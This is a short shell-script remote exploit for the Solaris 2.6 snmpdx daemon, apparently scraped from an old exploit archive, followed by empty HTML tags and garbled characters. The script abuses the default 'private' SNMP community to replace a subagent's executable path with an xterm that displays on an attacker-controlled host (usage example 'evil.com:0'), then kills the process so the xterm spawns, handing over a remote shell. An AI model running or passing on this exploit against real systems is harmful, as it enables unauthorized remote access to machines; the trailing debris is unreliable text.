#!/bin/sh # # Solaris 2.6 snmpdx private and lame remote exploit by acz@hert.org # if [ $# -ne 2 ]; then echo "Usage: $0 " echo " eg. $0 example.com evil.com:0" exit fi export TARGET=$1 export EVIL_DISPLAY=$2 PID=`snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.9.2|awk '{print $3}'` echo Process id of 2nd subagent: $PID $TARGET snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2 echo "Replacing Executable Path for 2nd subagent" eval 'snmpset 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2 s "/usr/openwin/bin/xterm -display $EVIL_DISPLAY -ut"' echo "Sending signal -KILL to process id $PID on $TARGET" snmpset 2>/dev/null $TARGET 'all private' .1.3.6.1.4.1.42.3.12.1.1.11.$PID i 9 echo "Wait for xterm now" # www.hack.co.za #
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß